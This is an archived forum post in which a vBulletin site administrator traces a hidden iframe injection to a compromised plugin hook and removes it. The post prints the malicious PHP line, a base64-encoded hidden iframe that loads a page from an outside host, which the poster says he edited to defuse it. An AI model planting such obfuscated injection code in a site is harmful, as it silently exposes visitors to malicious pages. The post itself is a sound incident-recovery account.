Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page Need a hand - Server "Hacked"
FAQ Community Calendar Today's Posts Search

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #3  
Old 03-06-2010, 06:43 PM
MrEyes MrEyes is offline
 
Join Date: Nov 2004
Posts: 380
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Having done a little more hunting around it seems that this problem lies with me using an older version of vbseo:

http://www.vbulletin.com/forum/showt...ease-some-tips.

However, I have upgraded the site and also run the suggested template reparser from here:

https://vborg.vbsupport.ru/showthrea...parse+template

But the iframe is still present on VB powered pages. Current searching through the DB to see if it is in there somewhere.

--------------- Added [DATE]1267912363[/DATE] at [TIME]1267912363[/TIME] ---------------

Well I am still at a loss

I have upgraded vBulletin to the latest 3.8 version, I have upgraded vbseo to the latest version.

I can only imagine that this is coming from the DB somehow - suppose I should keep looking through all the tables

--------------- Added [DATE]1267916034[/DATE] at [TIME]1267916034[/TIME] ---------------

Fixed

After upgrading the 3.8.4 PL1 and upgrading vbSEO the hole was plugged however the iframe was still present.

After searching through templates looking for "iframe" and not finding anything, I then started to look through files. After not finding anything in there I realised that I should have tried something else first, disable all hooks.

After doing this the problem was fixed, so the issue was with one of the plugins/products. By a process of elimation I tied this down to the vBSEO Downloads II product, specifically the hook onto global_complete.

At the end of the PHP code for this I found the following PHP code:

PHP Code:
echo base64_decode("PGlmcmFtZSBuYW1lPSJmcmEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZy
YW1lYm9yZGVyPSJubyIgbDSWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSJodHRw
Oi8vd3d3LmtvbGVrLmNvLmNjL3NlLnBocCI+PC9pZnJhbWU+"); 
I have edited the base64 string to prevent anybody doing something by accident

That base64 string contains the markup for the iframe, which is why DB, template, phrase etc searches turned up nothing when searching for "iframe" or other strings in the malicious code.

All fixed, panic over

Moral to this story, keep your software up to date - this was my fault

Moral #2 to this story - if this happens to you, just as a precaution change all your passwords, ftp, cpanel, plesk, forum accounts etc etc etc etc etc.
Reply With Quote
 

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 01:01 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05825 seconds
  • Memory Usage 2,298KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)bbcode_html
  • (1)bbcode_php
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (3)post_thanks_box
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)showthread_list
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_threadedmode.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids_threaded
  • showthread_threaded_construct_link
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete